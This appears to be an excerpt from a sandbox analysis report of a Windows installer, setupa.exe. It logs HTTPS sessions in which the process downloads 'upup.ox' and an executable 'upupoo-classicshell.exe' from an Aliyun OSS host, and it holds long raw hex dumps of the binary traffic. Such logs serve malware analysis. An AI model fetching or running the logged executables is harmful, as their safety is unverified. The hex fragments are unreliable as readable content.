2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 45 d8 c7 45 d8 94 17 0f 2e 50 e8 c3 0a 00 00 8b 35 3c 71 03 10 85 c0 b8 2c 00 00 00 b9 04 00 00 00 ba 8c 38 2c 8d 0f 44 c8 03 94 0e 44 43 c0 08 ff e2 a1 38 71 03 10 83 88 44 43 c0 08 04 8d 45 d8 c7 45 d8 94 17 0f 2e 50 e8 74 0d 00 00 8b 35 3c 71 03 10 31 c9 85 c0 ba 8c 38 2c 8d 0f 95 c1 03 94 8e 50 43 c0 08 ff e2 a1 38 71 03 10 83 88 44 43 c0 08 08 8d 45 d8 c7 45 d8 94 17 0f 2e 50 e8 dd cb ff ff 8b 35 3c 71 03 10 85 c0 b8 08 00 00 00 b9 24 00 00 00 ba 8c 38 2c 8d 0f 44 c8 03 94 0e 44 43 c0 08 ff e2 a1 38 71 03 10 83 88 44 43 c0 08 10 8d 45 d7 c7 45 d8 94 17 0f 2e 8d 4d d0 50 51 8d 45 d8 50 e8 26 e1 ff ff 83 7d d0 00 8b 35 3c 71 03 10 ba 34 00 00 00 b9 1c 00 00 00 0f 44 d1 85 c0 0f 48 d1 b9 8c 38 2c 8d 8b 84 16 44 43 c0 08 01 c8 ff e0 a1 38 71 03 10 31 f6
Data Ascii: EE.P5<q,8,DDC8qDCEE.Pt5<q18,PC8qDCEE.P5<q$8,DDC8qDCEE.MPQEP&}5<q4DH8,DC8q1
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: da ff e2 3d 86 f7 5c 16 ba 08 00 00 00 be 30 01 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 a1 ac 71 03 10 b9 ca 5b 85 61 c7 04 38 98 00 00 00 8b 04 24 c7 44 24 04 98 00 00 00 01 c8 e9 63 fb ff ff 31 d2 3d 1d 19 cb f4 0f 9c c2 8b 54 91 14 01 da ff e2 3d 11 5d 55 ee ba d8 00 00 00 be 34 01 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 a1 ac 71 03 10 b9 ca 5b 85 61 c7 04 38 80 00 00 00 8b 04 24 c7 44 24 04 80 00 00 00 01 c8 e9 15 fb ff ff 3d 5b f7 b7 63 ba 74 00 00 00 be c4 00 00 00 0f 4c d6 8b 14 11 01 da ff e2 3d 2e 86 45 61 ba ac 00 00 00 be 54 00 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 8b 4c 24 08 8b 14 24 b8 a9 a5 e9 f8 be d1 6c ea aa 01 c2 8b 04 24 01 f0 83 f9 08 0f 44 c2 e9 c0 fa ff ff 3d 13 d6 e1 11 ba b8 00 00 00 be 64 00 00 00 0f 44 d6 8b 0c 11 01 d9 ff e1 a1 ac 71 03
Data Ascii: =\0Dq[a8$D$c1=T=]U4Dq[a8$D$=[ctL=.EaTDL$$l$D=dDq
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 50 ff 15 0c b0 02 10 83 c4 08 5e 5f 5b 5d ff e0 cc cc 55 53 57 56 83 ec 34 b9 b4 34 4a 47 be 6c c0 3e 64 bf 04 00 00 00 bd 14 00 00 00 c7 04 24 94 17 0f 2e eb 18 66 2e 0f 1f 84 00 00 00 00 00 66 90 8b 0c 24 b8 a8 c7 d6 17 01 c1 b0 01 89 44 24 08 eb 1e 81 f9 3c df e5 45 ba 50 00 00 00 bb 20 00 00 00 0f 44 d3 8b 84 10 e0 6c 0f 58 01 f0 ff e0 a1 80 75 03 10 31 d2 81 f9 13 bf 25 09 0f 9f c2 8b 94 d0 20 6d 0f 58 01 f2 ff e2 81 f9 1f 20 8f c7 ba 28 00 00 00 0f 4c d7 8b 94 10 e0 6c 0f 58 01 f2 ff e2 81 f9 55 5e a5 b6 ba 44 00 00 00 bb 1c 00 00 00 0f 4c d3 8b 94 10 e0 6c 0f 58 01 f2 ff e2 31 d2 81 f9 69 db e2 a3 0f 95 c2 c1 e2 05 8b 84 02 14 6d 0f 58 01 f0 ff e0 8b 0c 24 b8 66 8d 3b 4c c7 44 24 0c 00 00 00 00 01 c1 eb 81 90 81 f9 b4 34 4a 47 ba 74 00 00 00 0f 4c
Data Ascii: P^_[]USWV44JGl>d$.f.f$D$<EP DlXu1% mX (LlXU^DLlX1imX$f;LD$4JGtL
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 18 eb 1f 6a 06 ff d7 8b 04 24 b9 d4 b5 47 fd 31 ed 01 c8 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 3d 14 61 22 f7 ba 04 00 00 00 7c 05 ba 98 00 00 00 8b 0d 64 83 03 10 8b 94 11 f4 16 f3 50 81 c1 f4 16 f3 50 01 f2 ff e2 3d f3 01 e0 c1 ba 24 00 00 00 7c 05 ba e8 00 00 00 8b 14 11 01 f2 ff e2 31 d2 3d e7 65 2b a7 0f 9c c2 c1 e2 05 8b 54 0a 38 01 f2 ff e2 3d e2 0b 94 9c ba 6c 00 00 00 7c 05 ba 88 00 00 00 8b 14 11 01 f2 ff e2 3d 52 1d da 8e ba 40 00 00 00 74 05 ba 64 00 00 00 8b 0c 11 01 f1 ff e1 66 2e 0f 1f 84 00 00 00 00 00 90 3d df 9d 38 54 ba 0c 00 00 00 7c 05 ba a4 00 00 00 8b 14 11 01 f2 ff e2 3d b7 66 07 1d ba 4c 00 00 00 7c 05 ba 30 00 00 00 8b 14 11 01 f2 ff e2 3d 98 20 c9 02 ba 48 00 00 00 7c 05 ba d4 00 00 00 8b 14 11 01 f2 ff e2 3d 14 61 22 f7
Data Ascii: j$G1f.D=a"|dPP=$|1=e+T8=l|=R@tdf.=8T|=fL|0= H|=a"
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 75 0c ff 75 08 e8 b1 fe ff ff 83 c4 0c 5d c2 0c 00 53 56 57 6a 00 68 a0 0f 00 00 68 2c 92 03 10 e8 f6 2d 00 00 83 c4 0c 68 28 c3 02 10 ff 15 40 b0 02 10 8b f0 85 f6 0f 84 8c 00 00 00 68 44 c3 02 10 56 ff 15 0c b0 02 10 68 60 c3 02 10 56 8b d8 ff 15 0c b0 02 10 68 7c c3 02 10 56 8b f8 ff 15 0c b0 02 10 8b f0 85 db 74 37 85 ff 74 33 85 f6 74 2f 83 25 48 92 03 10 00 8b cb 68 44 92 03 10 e8 6a 08 00 00 ff d3 57 e8 5e 2a 00 00 56 a3 4c 92 03 10 e8 53 2a 00 00 59 59 a3 50 92 03 10 eb 16 33 c0 50 50 6a 01 50 ff 15 6c b0 02 10 a3 48 92 03 10 85 c0 74 11 68 9f 8a 01 10 e8 c3 05 00 00 59 5f 5e 33 c0 5b c3 6a 07 e8 a7 06 00 00 cc 68 2c 92 03 10 ff 15 60 b0 02 10 a1 48 92 03 10 85 c0 74 07 50 ff 15 20 b0 02 10 c3 55 8b ec e8 96 00 00 00 8b 45 08 83 20 00 e8 d8 00 00
Data Ascii: uu]SVWjhh,-h(@hDVh`Vh|Vt7t3t/%HhDjW^*VLS*YYP3PPjPlHthY_^3[jh,`HtP UE
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 6a fe 68 80 c9 01 10 64 ff 35 00 00 00 00 a1 90 83 03 10 33 c4 50 8d 44 24 04 64 a3 00 00 00 00 8b 44 24 28 8b 58 08 8b 70 0c 83 fe ff 74 3a 83 7c 24 2c ff 74 06 3b 74 24 2c 76 2d 8d 34 76 8b 0c b3 89 4c 24 0c 89 48 0c 83 7c b3 04 00 75 17 68 01 01 00 00 8b 44 b3 08 e8 49 00 00 00 8b 44 b3 08 e8 5f 00 00 00 eb b7 8b 4c 24 04 64 89 0d 00 00 00 00 83 c4 18 5f 5e 5b c3 33 c0 64 8b 0d 00 00 00 00 81 79 04 80 c9 01 10 75 10 8b 51 0c 8b 52 0c 39 51 08 75 05 b8 01 00 00 00 c3 53 51 bb 10 84 03 10 eb 0b 53 51 bb 10 84 03 10 8b 4c 24 0c 89 4b 08 89 43 04 89 6b 0c 55 51 50 58 59 5d 59 5b c2 04 00 ff d0 c3 cc cc cc cc cc cc cc cc cc 55 8b ec 8b 4d 10 33 c0 53 56 83 ca ff 57 83 f9 ff 0f 84 96 00 00 00 8b 7d 08 8d 9b 00 00 00 00 8b 5d 0c 8d 0c 49 8b 74 8b 08 8d 1c 8b
Data Ascii: jhd53PD$dD$(Xpt:|$,t;t$,v-4vL$H|uhDID_L$d_^[3dyuQR9QuSQSQL$KCkUQPXY]Y[UM3SVW}]It
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: 04 24 2c 9a 03 10 e8 77 ff ff ff 59 b0 01 c3 b0 01 c3 e8 8a fb ff ff b0 01 c3 a1 90 83 03 10 56 6a 20 83 e0 1f 33 f6 59 2b c8 d3 ce 33 35 90 83 03 10 56 e8 00 07 00 00 56 e8 4f 01 00 00 56 e8 aa 33 00 00 56 e8 81 21 00 00 56 e8 48 f9 ff ff 83 c4 14 b0 01 5e c3 6a 00 e8 9d ae ff ff 59 c3 a1 c8 8a 03 10 83 c9 ff 56 f0 0f c1 08 75 1b a1 c8 8a 03 10 be a8 88 03 10 3b c6 74 0d 50 e8 f8 03 00 00 59 89 35 c8 8a 03 10 ff 35 94 9b 03 10 e8 e6 03 00 00 ff 35 98 9b 03 10 33 f6 89 35 94 9b 03 10 e8 d3 03 00 00 ff 35 a0 9e 03 10 89 35 98 9b 03 10 e8 c2 03 00 00 ff 35 a4 9e 03 10 89 35 a0 9e 03 10 e8 b1 03 00 00 83 c4 10 89 35 a4 9e 03 10 b0 01 5e c3 8b ff 55 8b ec 8d 41 04 8b d0 2b d1 83 c2 03 56 33 f6 c1 ea 02 3b c1 1b c0 f7 d0 23 c2 74 0d 8b 55 08 46 89 11 8d 49 04
Data Ascii: $,wYVj 3Y+35VVOV3V!VH^jYVu;tPY5553555555^UA+V3;#tUFI
2024-10-07 04:39:03 UTC | 16384 | IN | Data Raw: c3 8b ff 55 8b ec 51 51 a1 90 83 03 10 33 c5 89 45 fc 53 56 8b 75 18 57 85 f6 7e 14 56 ff 75 14 e8 ec 2b 00 00 59 3b c6 59 8d 70 01 7c 02 8b f0 8b 7d 24 85 ff 75 0b 8b 45 08 8b 00 8b 78 08 89 7d 24 33 c0 39 45 28 6a 00 6a 00 56 ff 75 14 0f 95 c0 8d 04 c5 01 00 00 00 50 57 ff 15 d4 b0 02 10 89 45 f8 85 c0 0f 84 8d 01 00 00 8d 14 00 8d 4a 08 3b d1 1b c0 85 c1 74 52 8d 4a 08 3b d1 1b c0 23 c1 8d 4a 08 3d 00 04 00 00 77 1d 3b d1 1b c0 23 c1 e8 6a 4a 00 00 8b dc 85 db 0f 84 4c 01 00 00 c7 03 cc cc 00 00 eb 1d 3b d1 1b c0 23 c1 50 e8 9f c4 ff ff 8b d8 59 85 db 0f 84 2d 01 00 00 c7 03 dd dd 00 00 83 c3 08 eb 02 33 db 85 db 0f 84 18 01 00 00 ff 75 f8 53 56 ff 75 14 6a 01 57 ff 15 d4 b0 02 10 85 c0 0f 84 ff 00 00 00 8b 7d f8 33 c0 50 50 50 50 50 57 53 ff 75 10 ff
Data Ascii: UQQ3ESVuW~Vu+Y;Yp|}$uEx}$39E(jjVuPWEJ;tRJ;#J=w;#jJL;#PY-3uSVujW}3PPPPPWSu


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49705 | 47.79.64.157 | 443 | 4768 | C:\Users\user\Desktop\setupa.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-07 04:39:05 UTC | 122 | OUT | GET /upup.ox HTTP/1.1
Connection: Keep-Alive
User-Agent: SecureWinHTTP/1.0
Host: kehu8.oss-cn-hongkong.aliyuncs.com
2024-10-07 04:39:05 UTC | 561 | IN | HTTP/1.1 200 OK
Server: AliyunOSS
Date: Mon, 07 Oct 2024 04:39:05 GMT
Content-Type: application/octet-stream
Content-Length: 89088
Connection: close
x-oss-request-id: 670365E964BB29343149E8D6
Accept-Ranges: bytes
ETag: "0528A5A3C232862A4B0D9624B6F23D0C"
Last-Modified: Mon, 23 Sep 2024 14:23:44 GMT
x-oss-object-type: Normal
x-oss-hash-crc64ecma: 17776391884417394777
x-oss-storage-class: Standard
x-oss-ec: 0048-00000113
Content-Disposition: attachment
x-oss-force-download: true
Content-MD5: BSilo8IyhipLDZYktvI9DA==
x-oss-server-time: 24
2024-10-07 04:39:05 UTC | 15823 | IN | Data Raw: a8 4b 10 75 55 22 a4 d9 1b 78 a1 d0 d0 15 64 e0 4d fc 37 8a 7c f7 69 5f 63 5e 5e eb 4b 5d 59 4d 28 7d 84 2f 09 7f 81 87 e4 dc 09 cd 31 eb 7b 51 4d 3c ef 78 0c af 2e 80 07 5b e3 78 b0 f1 93 de 35 0d 0b 68 69 7a a6 6b da ce 29 70 86 32 e4 94 a6 07 71 ea 3d ba b4 3f 73 3b 8a a3 27 db 2c 66 a4 78 1a 4e fc ea 68 05 d7 7d fc b9 1a f8 4b b3 49 c5 af 12 a5 19 38 c4 51 39 f1 39 58 9d 33 e5 7a 64 6a de f6 e4 47 83 6d a0 f3 98 42 8d 7b 13 e2 5f 6b 40 5a 09 6e 10 84 64 78 53 0d 45 74 dc d6 7f 8f 8c ab 49 65 61 dd ea 02 b3 02 f0 e0 82 48 a8 52 6d 2f 0b 35 ea 09 ce 1a a4 52 5f c4 d9 04 da 47 53 e3 af 32 e0 2c 0c 46 a7 4e 18 20 20 e2 ad 0f f8 bb c6 26 2d 84 db 22 f2 42 dc 5a 8c 10 45 95 47 12 e7 ac f3 54 ec a7 5c a3 df 97 1e 9a 0f 9c cb d2 0f db 3a 99 6d 1b 3c 66 b2 24
Data Ascii: KuU"xdM7|i_c^^K]YM(}/1{QM<x.[x5hizk)p2q=?s;',fxNh}KI8Q99X3zdjGmB{_k@ZndxSEtIeaHRm/5R_GS2,FN &-"BZEGT\:m<f$
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: b3 b9 c8 f9 e2 09 58 1e 8b be 6e 05 c2 14 ae ab f2 31 de 82 4a e5 fd 7f d6 94 bf d7 4d 36 bf bf 2b 37 21 20 3f c5 a8 8c 33 d1 23 42 d1 81 9c 56 af e7 76 bd 54 aa 74 7e b7 9f 78 52 d4 f1 a2 0f 99 e2 dc 56 60 9c 9f 0b de 03 c6 11 7b 21 d1 c0 24 0d 26 21 a1 83 f5 b3 20 42 92 48 4f 3a 54 6f c4 1f 85 ca a6 0e b1 f8 0a b0 9b 2c 3d 42 c5 77 d4 8c 45 80 d5 01 ea 7c 50 49 38 eb e5 1d e5 b2 c1 bf 92 d2 3d dc b9 6a 68 50 ee d0 20 6a b2 73 55 ef e4 18 96 07 ef 2e a7 c7 25 a8 dd 61 5a 30 6f b1 79 9e 82 22 68 76 68 d9 fd 36 e2 e7 d4 c7 c8 fb 28 37 ea 6c 3a 30 9f 29 78 cb 15 49 ae e3 c2 f9 79 25 bf 74 7e e0 39 b2 95 12 53 56 69 7f 07 fc 40 41 fd bf 23 94 12 17 58 4e a6 93 da 49 ce f6 25 77 39 81 af 4b e5 f7 04 99 0b b2 18 d4 63 47 55 77 8f f9 97 e6 48 84 96 21 bd f4 84
                                                                                                            Data Ascii: Xn1JM6+7! ?3#BVvTt~xRV`{!$&! BHO:To,=BwE|PI8=jhP jsU.%aZ0oy"hvh6(7l:0)xIy%t~9SVi@A#XNI%w9KcGUwH!
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: 6b 83 cc d3 01 fb 7d 50 21 ce b7 81 2b 67 94 2a 21 d9 9c 5d 43 4e 97 95 6e 26 0f 81 fa 50 56 d8 86 53 b2 b4 2e 3d 30 fb fd 6c 20 77 4a 84 e1 00 eb 30 31 5e b6 be 5d 15 5b 90 a4 cf 04 97 88 29 65 20 d1 36 96 f0 0e 2f 1f ea db b9 bd ea a2 af 57 cb 25 15 5f 54 a0 42 06 de 38 f6 78 0e 66 60 9f 20 d0 89 6e b4 c7 95 8d 92 07 3a 21 3f 47 e5 e7 f1 2a 72 43 44 02 4f 86 b5 0a d3 2b b3 01 ff e7 06 1f c5 74 a7 66 dd 65 c9 9a 87 7e cb 74 8c ce 8a 35 53 49 37 52 13 33 58 3f fe 98 91 7c 1f 15 9b 09 bc 0a 1e 58 58 81 48 55 db 8d ca 26 cd 3d 23 aa 60 4a bd 67 d9 ee 40 35 2b 81 db 97 b0 48 95 f6 12 55 f8 ad 23 56 5c 6f c1 75 6c 2b 3a 02 99 00 39 d2 8a 3d ba 3f 36 65 b3 97 ea 56 dc 68 cd 13 01 d1 f7 85 b0 4c 75 a1 7c 67 56 84 1a 5f 28 0e 0d d8 62 31 03 16 a1 a9 eb 67 4a c9
                                                                                                            Data Ascii: k}P!+g*!]CNn&PVS.=0l wJ01^][)e 6/W%_TB8xf` n:!?G*rCDO+tfe~t5SI7R3X?|XXHU&=#`Jg@5+HU#V\oul+:9=?6eVhLu|gV_(b1gJ
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: 3b 20 09 38 a9 33 35 92 91 58 76 09 ca 80 30 d0 9e 44 52 48 8f 95 83 d8 67 4b 2b 4a 46 cc 4e 67 ae 5e 5d a3 cf 81 e3 39 3f bc e5 22 aa 84 88 43 99 fb 8d 9b 06 23 2f 66 24 1c 4e 06 92 76 c1 63 66 4e f2 19 97 59 c9 20 32 c2 bf c1 80 85 4b cb f1 75 7b ad c8 52 78 7d 0a f3 ef 27 a1 d4 0b 12 25 2b 19 56 aa 9a b2 b9 0c a9 ac 62 60 72 5e 8f 87 d3 ac 1d cc 7a 3f 96 8a 3d ff d1 4c 92 54 17 ad 80 89 65 22 cc 97 6a b3 97 37 2f cc a4 e5 88 7d 28 f9 91 be 09 3a 08 d0 e2 a1 5c de a0 31 b1 c6 0b c2 47 59 25 78 b7 40 31 9d 37 92 15 6b fa c5 61 30 f5 51 aa d7 0e 00 f4 d8 f7 0a 3f ae 06 3c f0 91 3d e3 65 c8 6a f3 ad e8 18 fa 5e 72 8b 26 d3 9c 96 a8 08 c5 fa d1 be c4 12 3d b8 d7 04 ef db 56 40 a0 62 a8 eb e2 d0 7d 36 6d 27 b0 86 ae 6f b9 cb 3c 8f ca 52 90 76 d4 69 cd 03 93
                                                                                                            Data Ascii: ; 835Xv0DRHgK+JFNg^]9?"C#/f$NvcfNY 2Ku{Rx}'%+Vb`r^z?=LTe"j7/}(:\1GY%x@17ka0Q?<=ej^r&=V@b}6m'o<Rvi
                                                                                                            2024-10-07 04:39:05 UTC16384INData Raw: d1 f4 6d cf 6d 3f 0b c6 52 9e b8 bc 8f 2d 45 f4 bb 90 4d 24 d1 5b 32 15 49 8f 2e 11 2d 36 df 71 e7 cd ac 4d 16 b8 27 15 fa 57 66 e8 27 ba e1 9e 8c 92 3b de 53 e7 1e 4f a4 4d e6 f2 26 67 a5 a5 cd 40 0e d6 74 ca a1 0e 86 61 c6 eb 67 bd 21 9b bd a9 0d e6 48 23 82 06 2f 2d 83 c2 ff b2 d4 90 0a 2d 8c 96 a6 46 af 99 87 5c b3 0e 49 09 f3 9f 5a 3b 55 ee 69 0a 6c 52 09 25 25 73 ce 6f bf 75 93 4b 36 cc 36 9d c5 81 6a a0 98 55 ec 09 e2 81 e9 89 f5 38 f4 6e 55 bb e9 14 19 95 a2 07 30 f8 f8 09 1b ca 9b dc 41 72 34 75 fd 0e a3 2a 98 38 15 82 6a 0b b8 70 01 7e b3 f0 56 c8 5d 8c 3c e9 c7 da 48 77 3e d6 57 d7 9a 69 b8 4e 33 31 a1 20 35 c0 2e 5b 70 d7 2f 49 b6 b6 15 46 b4 0a 70 06 19 50 73 66 b7 d0 72 42 a7 8b e9 5f 0e 14 d3 92 0a eb 51 69 d5 a6 b9 53 11 59 f1 43 7a a8 82
                                                                                                            Data Ascii: mm?R-EM$[2I.-6qM'Wf';SOM&g@tag!H#/--F\IZ;UilR%%souK66jU8nU0Ar4u*8jp~V]<Hw>WiN31 5.[p/IFpPsfrB_QiSYCz
                                                                                                            2024-10-07 04:39:05 UTC7729INData Raw: 91 87 62 8a cd 9c fa c8 47 57 0c 07 62 02 d2 dd 9f 4f 23 ba 5a 71 db d2 f5 77 b7 65 a0 9f 57 27 f1 0a c3 ce ed 51 0c 12 66 c6 aa 6a 4b e4 10 20 0b af c4 3f ef 8a 41 22 2e a7 bc df e3 17 e6 17 d3 64 5b f2 4a 4e 92 26 5a 3c 8c 1b d3 b2 ca 3f 53 84 a1 02 99 cd e0 1d 21 25 10 b2 c5 6d ee 2b be 8d 79 40 b6 6e 71 97 30 9a a2 2f 43 03 3c 56 5a 34 9a a0 38 fd 26 bf ec 99 ce f9 8a bb 8d cd 1b 5d c7 c2 b3 45 ff 5a 5e cc 2c 91 cc cd 62 4a 89 bb c6 60 24 75 fc 59 3f 86 39 b0 42 e2 f5 15 3f 15 ea 94 78 77 23 b6 07 f6 9a e5 51 de ec 7e 4c 45 2c bc 34 31 bc fb f4 01 c2 3c 50 81 f2 51 56 94 70 86 41 af 93 43 65 7d d8 03 90 d0 86 08 aa 03 be f3 7e fb d9 2f dc 59 ea d6 4a 93 89 48 93 4d ce d8 5f 15 14 db dc 2c 97 0d d6 6b 0a d0 b5 ea 1e 75 a8 e0 d0 0c 82 58 ef 55 3d fb 26
                                                                                                            Data Ascii: bGWbO#ZqweW'QfjK ?A".d[JN&Z<?S!%m+y@nq0/C<VZ48&]EZ^,bJ`$uY?9B?xw#Q~LE,41<PQVpACe}~/YJHM_,kuXU=&


Session ID:2
Source IP:192.168.2.5
Source Port:49706
Destination IP:47.79.64.157
Destination Port:443
PID:4768
Process:C:\Users\user\Desktop\setupa.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-10-07 04:39:07 UTC138OUTGET /upupoo-classicshell.exe HTTP/1.1
                                                                                                            Connection: Keep-Alive
                                                                                                            User-Agent: SecureWinHTTP/1.0
                                                                                                            Host: kehu8.oss-cn-hongkong.aliyuncs.com
                                                                                                            2024-10-07 04:39:07 UTC562INHTTP/1.1 200 OK
                                                                                                            Server: AliyunOSS
                                                                                                            Date: Mon, 07 Oct 2024 04:39:07 GMT
                                                                                                            Content-Type: application/octet-stream
                                                                                                            Content-Length: 198920
                                                                                                            Connection: close
                                                                                                            x-oss-request-id: 670365EB9EB6B23232729FA9
                                                                                                            Accept-Ranges: bytes
                                                                                                            ETag: "606CDA46E88CE86AE85AC92B2B560D0A"
                                                                                                            Last-Modified: Mon, 23 Sep 2024 14:23:44 GMT
                                                                                                            x-oss-object-type: Normal
                                                                                                            x-oss-hash-crc64ecma: 12797003162322076001
                                                                                                            x-oss-storage-class: Standard
                                                                                                            x-oss-ec: 0048-00000113
                                                                                                            Content-Disposition: attachment
                                                                                                            x-oss-force-download: true
                                                                                                            Content-MD5: YGzaRuiM6GroWskrK1YNCg==
                                                                                                            x-oss-server-time: 37
                                                                                                            2024-10-07 04:39:07 UTC15822INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad b7 f6 fe e9 d6 98 ad e9 d6 98 ad e9 d6 98 ad e0 ae 0d ad fd d6 98 ad e0 ae 1b ad 67 d6 98 ad e0 ae 0b ad fa d6 98 ad e9 d6 99 ad 3c d6 98 ad e0 ae 1c ad aa d6 98 ad f7 84 0c ad e8 d6 98 ad e0 ae 09 ad e8 d6 98 ad 52 69 63 68 e9 d6 98 ad 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 60 9c 18 62 00 00 00 00 00 00 00 00 e0 00 02
                                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$g<RichPEL`b
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: ff ff 8d 4e 20 5e e9 f3 fe ff ff 8b ff 56 8b f1 8d 4e 14 e8 5d fe ff ff 33 c0 89 46 2c 89 46 30 89 46 34 8b c6 5e c3 8b ff 56 8b f1 8d 46 14 50 ff 15 84 31 41 00 8d 4e 2c 5e e9 bf fe ff ff 8b ff 56 8b f1 e8 c2 ff ff ff b8 00 00 40 00 8d 4e 14 c7 06 38 00 00 00 89 46 08 89 46 04 c7 46 0c 00 09 00 00 c7 46 10 ec 3f 41 00 e8 1b fe ff ff 85 c0 7d 07 c6 05 a8 9e 41 00 01 8b c6 5e c3 80 79 08 00 c7 01 fc 3f 41 00 74 0e 8b 49 04 85 c9 74 07 51 ff 15 88 31 41 00 c3 8b ff 55 8b ec ff 75 08 6a 00 ff 71 04 ff 15 6c 31 41 00 5d c2 04 00 8b ff 55 8b ec 83 7d 08 00 74 0e ff 75 08 6a 00 ff 71 04 ff 15 64 31 41 00 5d c2 04 00 8b ff 55 8b ec 33 c0 39 45 08 75 09 ff 75 0c 8b 01 ff 10 eb 21 39 45 0c 75 0c ff 75 08 8b 01 ff 50 04 33 c0 eb 10 ff 75 0c ff 75 08 50 ff 71 04 ff
                                                                                                            Data Ascii: N ^VN]3F,F0F4^VFP1AN,^V@N8FFFF?A}A^y?AtItQ1AUujql1A]U}tujqd1A]U39Euu!9EuuP3uuPq
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 61 ec ff ff 8b b8 94 00 00 00 e8 56 ec ff ff ff 75 08 33 f6 89 b0 94 00 00 00 e8 19 f9 ff ff 59 84 c0 75 4f 33 db 39 1f 7e 1d 8b 47 04 8b 4c 03 04 68 24 93 41 00 e8 13 c6 ff ff 84 c0 75 0d 46 83 c3 10 3b 37 7c e3 e8 09 03 00 00 6a 01 ff 75 08 e8 64 f8 ff ff 59 59 68 ac 41 41 00 8d 4d d4 e8 37 f6 ff ff 68 a4 65 41 00 8d 45 d4 50 e8 5e c5 ff ff 8b 75 08 bf 63 73 6d e0 39 3e 0f 85 88 01 00 00 83 7e 10 03 0f 85 7e 01 00 00 8b 46 14 3b c3 74 12 3d 21 05 93 19 74 0b 3d 22 05 93 19 0f 85 65 01 00 00 8b 7d 18 83 7f 0c 00 0f 86 bf 00 00 00 8d 45 e4 50 8d 45 f0 50 ff 75 f8 ff 75 20 57 e8 ac c8 ff ff 83 c4 14 8b f8 8b 45 f0 3b 45 e4 0f 83 97 00 00 00 8b 45 f8 39 07 0f 8f 81 00 00 00 3b 47 04 7f 7c 8b 47 10 89 45 f4 8b 47 0c 89 45 e8 85 c0 7e 6c 8b 46 1c 8b 40 0c 8d
                                                                                                            Data Ascii: aVu3YuO39~GLh$AuF;7|judYYhAAM7heAEP^ucsm9>~~F;t=!t="e}EPEPuu WE;EE9;G|GEGE~lF@
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: 06 89 46 08 89 46 04 5e 5d c3 8b ff 55 8b ec 53 56 8b 75 08 8b 46 0c 8b c8 80 e1 03 33 db 80 f9 02 75 40 a9 08 01 00 00 74 39 8b 46 08 57 8b 3e 2b f8 85 ff 7e 2c 57 50 56 e8 69 ff ff ff 59 50 e8 8f 19 00 00 83 c4 0c 3b c7 75 0f 8b 46 0c 84 c0 79 0f 83 e0 fd 89 46 0c eb 07 83 4e 0c 20 83 cb ff 5f 8b 46 08 83 66 04 00 89 06 5e 8b c3 5b 5d c3 8b ff 55 8b ec 56 8b 75 08 85 f6 75 09 56 e8 35 00 00 00 59 eb 2f 56 e8 7c ff ff ff 59 85 c0 74 05 83 c8 ff eb 1f f7 46 0c 00 40 00 00 74 14 56 e8 00 ff ff ff 50 e8 80 33 00 00 59 f7 d8 59 1b c0 eb 02 33 c0 5e 5d c3 6a 14 68 c0 66 41 00 e8 f0 9b ff ff 33 ff 89 7d e4 89 7d dc 6a 01 e8 15 c5 ff ff 59 89 7d fc 33 f6 89 75 e0 3b 35 e0 bb 41 00 0f 8d 83 00 00 00 a1 c4 ab 41 00 8d 04 b0 39 38 74 5e 8b 00 f6 40 0c 83 74 56 50
                                                                                                            Data Ascii: FF^]USVuF3u@t9FW>+~,WPViYP;uFyFN _Ff^[]UVuuV5Y/V|YtF@tVP3YY3^]jhfA3}}jY}3u;5AA98t^@tVP
                                                                                                            2024-10-07 04:39:07 UTC16384INData Raw: e6 02 8d 4d e8 5a 2b ce 3b d0 7c 08 8b 31 89 74 95 e0 eb 05 83 64 95 e0 00 4a 83 e9 04 85 d2 7d e7 33 c0 5e 6a 1f 59 2b 0d 30 9b 41 00 d3 e3 8b 4d ec f7 d9 1b c9 81 e1 00 00 00 80 0b d9 8b 0d 34 9b 41 00 0b 5d e0 83 f9 40 75 0d 8b 4d 0c 8b 55 e4 89 59 04 89 11 eb 0a 83 f9 20 75 05 8b 4d 0c 89 19 5f 5b c9 c3 8b ff 55 8b ec 83 ec 2c 8b 45 08 0f b7 48 0a 53 8b d9 81 e1 00 80 00 00 89 4d ec 8b 48 06 89 4d e0 8b 48 02 0f b7 00 81 e3 ff 7f 00 00 81 eb ff 3f 00 00 c1 e0 10 57 89 4d e4 89 45 e8 81 fb 01 c0 ff ff 75 27 33 db 33 c0 39 5c 85 e0 75 0d 40 83 f8 03 7c f4 33 c0 e9 a5 04 00 00 33 c0 8d 7d e0 ab ab 6a 02 ab 58 e9 95 04 00 00 83 65 08 00 56 8d 75 e0 8d 7d d4 a5 a5 a5 8b 35 44 9b 41 00 4e 8d 4e 01 8b c1 99 83 e2 1f 03 c2 c1 f8 05 8b d1 81 e2 1f 00 00 80 89
